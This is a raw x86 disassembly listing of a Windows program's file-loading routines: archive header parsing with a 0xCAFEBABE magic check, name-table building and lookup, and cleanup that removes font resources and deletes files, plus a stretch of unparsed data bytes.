loc_4D38CB: ; CODE XREF: sub_4D3610+31D�j
push 2
push 0
mov ecx, [ebp+var_78]
sub ecx, 1
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_140], eax
push 0
lea eax, [ebp+var_13C]
push eax
push 1
lea ecx, [ebp+var_138]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E177C ; ReadFile
test eax, eax
jnz short loc_4D3910
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3910: ; CODE XREF: sub_4D3610+2F4�j
cmp [ebp+var_138], 0
jz short loc_4D391B
jmp short loc_4D392F
; ---------------------------------------------------------------------------
loc_4D391B: ; CODE XREF: sub_4D3610+307�j
mov eax, [ebp+var_78]
sub eax, 1
mov [ebp+var_78], eax
mov ecx, [ebp+var_54]
sub ecx, 1
mov [ebp+var_54], ecx
jmp short loc_4D38CB
; ---------------------------------------------------------------------------
loc_4D392F: ; CODE XREF: sub_4D3610+A1�j
; sub_4D3610+B4�j ...
push 2
push 0
mov edx, [ebp+var_78]
sub edx, 4
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_74], eax
mov ecx, [ebp+var_54]
add ecx, [ebp+var_78]
mov [ebp+var_54], ecx
mov [ebp+var_144], 0
push 0
lea edx, [ebp+var_144]
push edx
push 4
lea eax, [ebp+var_148]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3983
cmp [ebp+var_144], 4
jz short loc_4D398D
loc_4D3983: ; CODE XREF: sub_4D3610+368�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D398D: ; CODE XREF: sub_4D3610+371�j
cmp [ebp+var_148], 0CAFEBABEh
jz short loc_4D39B0
mov edx, [ebp+var_148]
xor edx, 0CAFEBABEh
xor edx, [ebp+var_54]
mov [ebp+var_308], edx
jmp short loc_4D39BB
; ---------------------------------------------------------------------------
loc_4D39B0: ; CODE XREF: sub_4D3610+387�j
mov eax, ds:dword_4E0BD8
mov [ebp+var_308], eax
loc_4D39BB: ; CODE XREF: sub_4D3610+39E�j
mov ecx, [ebp+var_308]
mov [ebp+var_14C], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_4D39EF
mov eax, offset dword_4E0BD8
lea ecx, [ebp+var_14C]
mov edx, [ecx]
cmp edx, [eax]
jz short loc_4D39EF
mov ecx, 0EF000007h
call sub_4D8342
loc_4D39EF: ; CODE XREF: sub_4D3610+3C2�j
; sub_4D3610+3D3�j
push 2
push 0
mov eax, [ebp+var_78]
sub eax, 14h
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_150], 0
push 0
lea edx, [ebp+var_150]
push edx
push 10h
lea eax, [ebp+var_4C]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3A34
cmp [ebp+var_150], 10h
jz short loc_4D3A3E
loc_4D3A34: ; CODE XREF: sub_4D3610+419�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3A3E: ; CODE XREF: sub_4D3610+422�j
mov edx, [ebp+arg_8]
and edx, 0FFh
neg edx
sbb edx, edx
and edx, 0Ch
mov [ebp+var_68], edx
push 2
push 0
mov eax, [ebp+var_68]
add eax, 2Ch
mov ecx, [ebp+var_78]
sub ecx, eax
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_154], 0
mov eax, [ebp+arg_8]
and eax, 0FFh
test eax, eax
jz loc_4D3B15
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_34]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3AAB
cmp [ebp+var_154], 4
jz short loc_4D3AB5
loc_4D3AAB: ; CODE XREF: sub_4D3610+490�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3AB5: ; CODE XREF: sub_4D3610+499�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_50]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3ADB
cmp [ebp+var_154], 4
jz short loc_4D3AE5
loc_4D3ADB: ; CODE XREF: sub_4D3610+4C0�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3AE5: ; CODE XREF: sub_4D3610+4C9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3B0B
cmp [ebp+var_154], 4
jz short loc_4D3B15
loc_4D3B0B: ; CODE XREF: sub_4D3610+4F0�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3B15: ; CODE XREF: sub_4D3610+46F�j
; sub_4D3610+4F9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_60]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3B3B
cmp [ebp+var_154], 4
jz short loc_4D3B45
loc_4D3B3B: ; CODE XREF: sub_4D3610+520�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3B45: ; CODE XREF: sub_4D3610+529�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_70]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3B6B
cmp [ebp+var_154], 4
jz short loc_4D3B75
loc_4D3B6B: ; CODE XREF: sub_4D3610+550�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3B75: ; CODE XREF: sub_4D3610+559�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3B9B
cmp [ebp+var_154], 4
jz short loc_4D3BA5
loc_4D3B9B: ; CODE XREF: sub_4D3610+580�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3BA5: ; CODE XREF: sub_4D3610+589�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_64]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3BCB
cmp [ebp+var_154], 4
jz short loc_4D3BD5
loc_4D3BCB: ; CODE XREF: sub_4D3610+5B0�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3BD5: ; CODE XREF: sub_4D3610+5B9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_6C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3BFB
cmp [ebp+var_154], 4
jz short loc_4D3C05
loc_4D3BFB: ; CODE XREF: sub_4D3610+5E0�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3C05: ; CODE XREF: sub_4D3610+5E9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_58]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz short loc_4D3C2B
cmp [ebp+var_154], 4
jz short loc_4D3C35
loc_4D3C2B: ; CODE XREF: sub_4D3610+610�j
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3C35: ; CODE XREF: sub_4D3610+619�j
mov ecx, [ebp+arg_8]
and ecx, 0FFh
test ecx, ecx
jz loc_4D3E52
cmp [ebp+var_50], 0
jz loc_4D3E52
cmp [ebp+var_34], 0
jz loc_4D3E52
push 24h
call sub_4D835A
add esp, 4
mov [ebp+var_2D8], eax
mov edx, [ebp+var_2D8]
mov [ebp+var_158], edx
mov eax, [ebp+var_1C]
add eax, 1
push eax
call sub_4D835A
add esp, 4
mov [ebp+var_2DC], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2DC]
mov [ecx+0Ch], edx
mov ecx, [ebp+var_1C]
add ecx, 1
mov esi, [ebp+arg_0]
mov eax, [ebp+var_158]
mov edi, [eax+0Ch]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_158]
mov dword ptr [eax], 0
push 10h
call sub_4D835A
add esp, 4
mov [ebp+var_2E0], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2E0]
mov [ecx+4], edx
push 4
call sub_4D835A
add esp, 4
mov [ebp+var_2E4], eax
mov eax, [ebp+var_158]
mov ecx, [ebp+var_2E4]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov dword ptr [edx+18h], 1
mov eax, [ebp+var_158]
mov dword ptr [eax+14h], 0
push 0
push 0
mov ecx, [ebp+var_158]
add ecx, 1Ch
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E1704 ; GetFileTime
mov edi, ds:dword_4E190C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, ds:dword_4E1908
sub ecx, [eax+0C14h]
mov [ebp+var_15C], ecx
mov ecx, [ebp+var_15C]
add ecx, 1
push ecx
call sub_4D835A
add esp, 4
mov [ebp+var_2E8], eax
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_2E8]
mov [eax], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_158]
mov edx, [ecx+8]
mov eax, [eax]
mov [edx], eax
mov ecx, [ebp+var_15C]
add ecx, 1
mov edx, ds:dword_4E1908
mov esi, ds:dword_4E190C
add esi, [edx+0C14h]
mov eax, [ebp+var_158]
mov edx, [eax+8]
mov edi, [edx]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_15C]
push ecx
mov edx, [ebp+var_158]
mov eax, [edx+8]
mov ecx, [eax]
push ecx
call ds:dword_4E17C8 ; CharUpperBuffA
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov [eax+4], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_50]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov [eax+0Ch], ecx
mov edx, ds:dword_4E1908
mov [ebp+var_160], edx
mov eax, [ebp+var_158]
mov ecx, [ebp+var_160]
mov edx, [ecx]
mov [eax+10h], edx
mov eax, [ebp+var_160]
mov ecx, [ebp+var_158]
mov [eax], ecx
mov edx, ds:dword_4E1908
mov eax, [edx+4]
add eax, 1
mov ecx, ds:dword_4E1908
mov [ecx+4], eax
loc_4D3E52: ; CODE XREF: sub_4D3610+630�j
; sub_4D3610+63A�j ...
mov edx, [ebp+var_54]
sub edx, [ebp+var_58]
mov [ebp+var_58], edx
mov eax, [ebp+var_3C]
add eax, [ebp+var_58]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_54]
sub ecx, [ebp+var_3C]
test ecx, ecx
jb short loc_4D3E79
mov edx, [ebp+var_54]
sub edx, [ebp+var_3C]
cmp [ebp+var_60], edx
jbe short loc_4D3E83
loc_4D3E79: ; CODE XREF: sub_4D3610+85C�j
mov ecx, 0EF000007h
call sub_4D8342
loc_4D3E83: ; CODE XREF: sub_4D3610+867�j
mov eax, [ebp+var_60]
push eax
call sub_4D835A
add esp, 4
mov [ebp+var_2EC], eax
mov ecx, [ebp+var_2EC]
mov [ebp+var_24], ecx
mov [ebp+var_234], 0
mov [ebp+var_238], 0
push 0
push 0
mov edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E1788 ; SetFilePointer
loc_4D3EC4: ; CODE XREF: sub_4D3610+90A�j
mov ecx, [ebp+var_238]
cmp ecx, [ebp+var_60]
jz short loc_4D3F1C
mov [ebp+var_234], 0
push 0
lea edx, [ebp+var_234]
push edx
mov eax, [ebp+var_60]
sub eax, [ebp+var_238]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4E177C ; ReadFile
test eax, eax
jnz short loc_4D3F08
mov ecx, 0EF000006h
call sub_4D8342
loc_4D3F08: ; CODE XREF: sub_4D3610+8EC�j
mov eax, [ebp+var_238]
add eax, [ebp+var_234]
mov [ebp+var_238], eax
jmp short loc_4D3EC4
; ---------------------------------------------------------------------------
loc_4D3F1C: ; CODE XREF: sub_4D3610+8BD�j
push 120000h
call sub_4CDB7E
fxch4 st(2)
push esp
mov ebp, 46EE4704h
fst st
iret
sub_4D3610 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0F5h, 0E9h, 1Eh
dd 0D5E28C45h, 8C62D4A7h, 7CF0AAEEh, 88AF283Eh, 0D6A56BD3h
dd 7F01D584h, 9F85C5B6h, 0E7618390h, 0A2424F41h, 0FED9E4FEh
dd 0CDB905E3h, 55C9DCC0h, 0EF5F05A1h, 6E843F49h, 52F6001Ah
dd 67F55184h, 978DDDCEh, 1D797B88h, 0BA3A4746h, 6F9ECF7h
dd 0C5B6D5FBh, 339090B8h, 75D285D2h, 4C8D8DEEh, 0E8FFFFFDh
dd 37FCh, 50A0458Bh, 51DC4D8Bh, 0FD4C8D8Dh, 0F5E8FFFFh
dd 8D000037h, 0FFFDB895h, 8D8D52FFh, 0FFFFFD4Ch, 389CE8h
dd 4B900h, 0BD8D0000h, 0FFFFFDB8h, 33B4758Dh, 74A7F3C0h
dd 7B90Ah, 63E8EF00h, 6A000043h, 4374E824h, 0C4830000h
dd 10858904h, 8BFFFFFDh, 0FFFD108Dh, 0E04D89FFh, 83E4558Bh
dd 0E85201C2h, 4356h, 8904C483h, 0FFFD0C85h, 0E0458BFFh
dd 0FD0C8D8Bh, 4889FFFFh, 0E44D8B0Ch, 8B01C183h, 558B0875h
dd 0C7A8BE0h, 0E9C1C18Bh, 8BA5F302h, 3E183C8h, 4D8BA4F3h
dd 0DC558BE0h, 458B1189h, 9C4503DCh, 89E04D8Bh, 558B0441h
dd 2E2C194h, 4304E852h, 0C4830000h, 8858904h, 8BFFFFFDh
dd 8D8BE045h, 0FFFFFD08h, 8B084889h, 458BE055h, 18428994h
dd 0C7E04D8Bh, 1441h, 558D0000h, 458D52D0h, 4D8B50D0h
dd 1CC183E0h, 0D8558B51h, 415FF52h, 8B004E17h, 7883E045h
dd 16750020h, 83E04D8Bh, 75001C79h, 0E0558B0Dh, 521CC283h
dd 172C15FFh, 45C7004Eh, 0A4h, 8B09EB00h, 0C083A445h, 0A4458901h
dd 3BA44D8Bh, 830F944Dh, 0E3h, 0C1A4558Bh, 458B04E2h, 4488BE0h
dd 3DC458Bh, 4D8B1104h, 4E1C1A4h, 8BE0558Bh, 4890452h
dd 0A4458B0Ah, 8B04E0C1h, 518BE04Dh, 23C8B04h, 33FFC983h
dd 0F7AEF2C0h, 0FFC183D1h, 0FD488D89h, 858BFFFFh, 0FFFFFD48h
dd 5001C083h, 4235E8h, 4C48300h, 0FD048589h, 4D8BFFFFh
dd 8518BE0h, 8BA4458Bh, 0FFFD048Dh, 820C89FFh, 0FD488D8Bh
dd 0C183FFFFh, 0A4558B01h, 8B04E2C1h
db 45h, 0E0h
word_4D4152 dw 408Bh ; DATA XREF: _2:off_429D5C�o
dd 10348B04h, 8BE0558Bh, 558B0842h, 903C8BA4h, 0E9C1C18Bh
dd 8BA5F302h, 3E183C8h, 8D8BA4F3h, 0FFFFFD48h, 0A4558B51h
dd 8B04E2C1h, 488BE045h, 11148B04h, 0C815FF52h, 8B004E17h
dd 0E0C1A445h, 0E04D8B04h, 8B04518Bh, 3040244h, 4D8BA845h
dd 4E1C1A4h, 8BE0558Bh, 44890452h, 8E9040Ah, 8BFFFFFFh
dd 4503DC45h, 0FC7881A0h, 0FEFEFEFEh, 0A7850Fh, 4D8B0000h
dd 0A04D03DCh, 89F8518Bh, 0FFFD3C95h, 0DC458BFFh, 8BA04503h
dd 8D89F448h, 0FFFFFD40h, 3DC558Bh, 0FFFD4095h, 449589FFh
dd 0C7FFFFFDh, 0FFFD3885h, 0FFh, 8B0FEB00h, 0FFFD3885h
dd 1C083FFh, 0FD388589h, 8D8BFFFFh, 0FFFFFD38h, 0FD3C8D3Bh
dd 3A73FFFFh, 0FD38958Bh, 0D26BFFFFh, 44858B18h, 3FFFFFDh
dd 348589C2h, 8BFFFFFDh, 0FFFD348Dh, 0DC558BFFh, 8B105103h
dd 0FFFD3485h, 105089FFh, 0FD348D8Bh, 8D89FFFFh, 0FFFFFD30h
dd 958BA9EBh, 0FFFFFD44h, 18F01589h, 858B004Eh, 0FFFFFD3Ch
dd 4E18F4A3h, 80D8B00h, 89004E19h, 0FFFD2C8Dh, 2C958BFFh
dd 83FFFFFDh, 840F003Ah, 152h, 8908458Bh, 0FFFCF485h, 2C8D8BFFh
dd 8BFFFFFDh, 0C428B11h, 0FCF08589h, 8D8BFFFFh, 0FFFFFCF0h
dd 9588118Ah, 0FFFFFCEFh, 0FCF4858Bh, 103AFFFFh, 0BD804675h
dd 0FFFFFCEFh, 8B317400h, 0FFFCF08Dh, 1518AFFh, 0FCEE9588h
dd 858BFFFFh, 0FFFFFCF4h, 7501503Ah, 0F0858323h, 2FFFFFCh
dd 0FCF48583h, 8002FFFFh, 0FFFCEEBDh, 0AE7500FFh, 0FCE885C7h
dd 0FFFFh, 0BEB0000h, 0D983C91Bh, 0E88D89FFh, 8BFFFFFCh
dd 0FFFCE895h, 0E49589FFh, 83FFFFFCh, 0FFFCE4BDh, 57D00FFh
dd 0B5E9h, 1908A100h, 0C083004Eh, 0E0858910h, 8BFFFFFCh
dd 0FFFD2C8Dh, 8B118BFFh, 85890C42h, 0FFFFFCDCh, 0FCDC8D8Bh
dd 118AFFFFh, 0FCDB9588h, 858BFFFFh, 0FFFFFCE0h, 4675103Ah
dd 0FCDBBD80h, 7400FFFFh, 0DC8D8B31h, 8AFFFFFCh, 95880151h
dd 0FFFFFCDAh, 0FCE0858Bh, 503AFFFFh, 83237501h, 0FFFCDC85h
dd 858302FFh, 0FFFFFCE0h, 0DABD8002h, 0FFFFFCh, 85C7AE75h
dd 0FFFFFCD4h, 0
; ---------------------------------------------------------------------------
jmp short loc_4D43B1
; ---------------------------------------------------------------------------
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
mov [ebp-32Ch], ecx
loc_4D43B1: ; CODE XREF: _4:004D43A4�j
mov edx, [ebp-32Ch]
mov [ebp-330h], edx
cmp dword ptr [ebp-330h], 0
jnz short loc_4D43C8
jmp short loc_4D43DE
; ---------------------------------------------------------------------------
loc_4D43C8: ; CODE XREF: _4:004D43C4�j
mov eax, [ebp-2D4h]
mov ecx, [eax]
add ecx, 10h
mov [ebp-2D4h], ecx
jmp near ptr dword_4D4154+129h
; ---------------------------------------------------------------------------
loc_4D43DE: ; CODE XREF: _4:004D43C6�j
mov edx, [ebp-20h]
mov eax, [ebp-2D4h]
mov ecx, [eax]
mov [edx+10h], ecx
mov edx, [ebp-2D4h]
mov eax, [ebp-20h]
mov [edx], eax
mov ecx, ds:dword_4E1908
mov edx, [ecx+4]
add edx, [ebp-6Ch]
mov eax, ds:dword_4E1908
mov [eax+4], edx
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4D4427
jmp short loc_4D4474
; =============== S U B R O U T I N E =======================================
sub_4D4427 proc near ; CODE XREF: _4:004D4420�p
; DATA XREF: _5:004DE428�o
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_4D4437
mov ecx, [ebp-28h]
push ecx
call ds:dword_4E16A4 ; CloseHandle
loc_4D4437: ; CODE XREF: sub_4D4427+4�j
cmp dword ptr [ebp-24h], 0
jz short loc_4D4455
mov edx, [ebp-24h]
mov [ebp-300h], edx
mov eax, [ebp-300h]
push eax
call sub_4D83DD
add esp, 4
loc_4D4455: ; CODE XREF: sub_4D4427+14�j
cmp dword ptr [ebp-20h], 0
jz short locret_4D4473
mov ecx, [ebp-20h]
mov [ebp-304h], ecx
mov edx, [ebp-304h]
push edx
call sub_4D83DD
add esp, 4
locret_4D4473: ; CODE XREF: sub_4D4427+32�j
retn
sub_4D4427 endp
; ---------------------------------------------------------------------------
loc_4D4474: ; CODE XREF: _4:004D4425�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D4490 proc near ; CODE XREF: sub_4D2DD0+623�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D46B5 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE430
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, ds:dword_4E1908
mov dword ptr [eax+0Ch], 0
mov ecx, ds:dword_4E1908
mov edx, [ecx+4]
shl edx, 4
push edx
call sub_4D835A
add esp, 4
mov [ebp+var_40], eax
mov eax, [ebp+var_40]
mov [ebp+var_1C], eax
loc_4D44EB: ; CODE XREF: sub_4D4490+1E7�j
mov [ebp+var_34], 0
mov [ebp+var_28], 0
mov [ebp+var_30], 0
mov ecx, ds:dword_4E1908
mov edx, [ecx]
mov [ebp+var_20], edx
jmp short loc_4D4516
; ---------------------------------------------------------------------------
loc_4D450D: ; CODE XREF: sub_4D4490+9E�j
; sub_4D4490+132�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
mov [ebp+var_20], ecx
loc_4D4516: ; CODE XREF: sub_4D4490+7B�j
cmp [ebp+var_20], 0
jz loc_4D45F9
mov edx, [ebp+var_20]
mov eax, [ebp+var_20]
mov ecx, [edx+14h]
cmp ecx, [eax+18h]
jnz short loc_4D4530
jmp short loc_4D450D
; ---------------------------------------------------------------------------
loc_4D4530: ; CODE XREF: sub_4D4490+9C�j
cmp [ebp+var_30], 0
jz loc_4D45D2
mov edx, [ebp+var_20]
mov eax, [edx+14h]
shl eax, 4
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
mov [ebp+var_48], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_4C], edx
loc_4D455C: ; CODE XREF: sub_4D4490+FE�j
mov eax, [ebp+var_4C]
mov cl, [eax]
mov [ebp+var_4D], cl
mov edx, [ebp+var_48]
cmp cl, [edx]
jnz short loc_4D4599
cmp [ebp+var_4D], 0
jz short loc_4D4590
mov eax, [ebp+var_4C]
mov cl, [eax+1]
mov [ebp+var_4E], cl
mov edx, [ebp+var_48]
cmp cl, [edx+1]
jnz short loc_4D4599
add [ebp+var_4C], 2
add [ebp+var_48], 2
cmp [ebp+var_4E], 0
jnz short loc_4D455C
loc_4D4590: ; CODE XREF: sub_4D4490+DF�j
mov [ebp+var_54], 0
jmp short loc_4D45A1
; ---------------------------------------------------------------------------
loc_4D4599: ; CODE XREF: sub_4D4490+D9�j
; sub_4D4490+F0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_54], eax
loc_4D45A1: ; CODE XREF: sub_4D4490+107�j
mov ecx, [ebp+var_54]
mov [ebp+var_58], ecx
mov edx, [ebp+var_58]
mov [ebp+var_3C], edx
cmp [ebp+var_3C], 0
jnz short loc_4D45C7
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_20]
mov [edx+14h], ecx
jmp loc_4D450D
; ---------------------------------------------------------------------------
loc_4D45C7: ; CODE XREF: sub_4D4490+121�j
cmp [ebp+var_3C], 0
jle short loc_4D45D2
jmp loc_4D450D
; ---------------------------------------------------------------------------
loc_4D45D2: ; CODE XREF: sub_4D4490+A4�j
; sub_4D4490+13B�j
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov edx, [ecx+14h]
shl edx, 4
mov eax, [ebp+var_28]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
mov eax, [edx]
mov [ebp+var_30], eax
jmp loc_4D450D
; ---------------------------------------------------------------------------
loc_4D45F9: ; CODE XREF: sub_4D4490+8A�j
cmp [ebp+var_30], 0
jnz short loc_4D4601
jmp short loc_4D467C
; ---------------------------------------------------------------------------
loc_4D4601: ; CODE XREF: sub_4D4490+16D�j
mov ecx, ds:dword_4E1908
mov edx, [ecx+0Ch]
shl edx, 4
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+var_34]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_28]
mov [eax+0Ch], ecx
mov edx, [ebp+var_24]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
sub ecx, [eax+4]
sar ecx, 4
mov edx, [ebp+var_28]
mov eax, [edx+8]
mov edx, [ebp+var_24]
mov eax, [eax+ecx*4]
mov [edx+4], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, ds:dword_4E1908
mov ecx, [eax+0Ch]
add ecx, 1
mov edx, ds:dword_4E1908
mov [edx+0Ch], ecx
mov eax, [ebp+var_28]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_28]
mov [edx+14h], ecx
jmp loc_4D44EB
; ---------------------------------------------------------------------------
loc_4D467C: ; CODE XREF: sub_4D4490+16F�j
mov eax, ds:dword_4E1908
mov ecx, [ebp+var_1C]
mov [eax+8], ecx
mov [ebp+var_1C], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_4D469C
jmp short loc_4D46B5
sub_4D4490 endp
; =============== S U B R O U T I N E =======================================
sub_4D469C proc near ; CODE XREF: sub_4D4490+205�p
; DATA XREF: _5:004DE438�o
cmp dword ptr [ebp-1Ch], 0
jz short locret_4D46B4
mov edx, [ebp-1Ch]
mov [ebp-44h], edx
mov eax, [ebp-44h]
push eax
call sub_4D83DD
add esp, 4
locret_4D46B4: ; CODE XREF: sub_4D469C+4�j
retn
sub_4D469C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D4490
loc_4D46B5: ; CODE XREF: sub_4D4490+20A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4D4490
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D46D0 proc near ; CODE XREF: sub_4DA0C8+77�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D47AE SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE440
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE4h
push ebx
push esi
push edi
mov eax, ds:dword_4E18E8
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_4D4714
mov ecx, [ebp+var_24]
add ecx, 10h
push ecx
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov byte ptr [ebp+var_28], 1
jmp short loc_4D4718
; ---------------------------------------------------------------------------
loc_4D4714: ; CODE XREF: sub_4D46D0+2F�j
mov byte ptr [ebp+var_28], 0
loc_4D4718: ; CODE XREF: sub_4D46D0+42�j
mov edx, [ebp+var_28]
and edx, 0FFh
test edx, edx
jz loc_4D47AE
mov [ebp+var_4], 0
cmp ds:dword_4E18E8, 0
jz short loc_4D4783
mov ecx, ds:dword_4E18E8
call sub_4DBA67
loc_4D4744: ; CODE XREF: sub_4D46D0:loc_4D4781�j
lea eax, [ebp+var_1C]
push eax
lea ecx, [ebp+var_20]
push ecx
mov ecx, ds:dword_4E18E8
call sub_4DBA7E
and eax, 0FFh
test eax, eax
jz short loc_4D4783
mov edx, [ebp+var_1C]
cmp dword ptr [edx], 0
jnz short loc_4D4781
mov eax, [ebp+var_20]
mov ecx, [eax]
push ecx
call ds:dword_4E17EC ; RemoveFontResourceA
mov edx, [ebp+var_1C]
mov eax, [edx+4]
push eax
call ds:dword_4E16C0 ; DeleteFileA
loc_4D4781: ; CODE XREF: sub_4D46D0+96�j
jmp short loc_4D4744
; ---------------------------------------------------------------------------
loc_4D4783: ; CODE XREF: sub_4D46D0+67�j
; sub_4D46D0+8E�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_4D4791
jmp short loc_4D47AE
sub_4D46D0 endp
; =============== S U B R O U T I N E =======================================
sub_4D4791 proc near ; CODE XREF: sub_4D46D0+BA�p
; DATA XREF: _5:004DE448�o
mov ecx, ds:dword_4E18E8
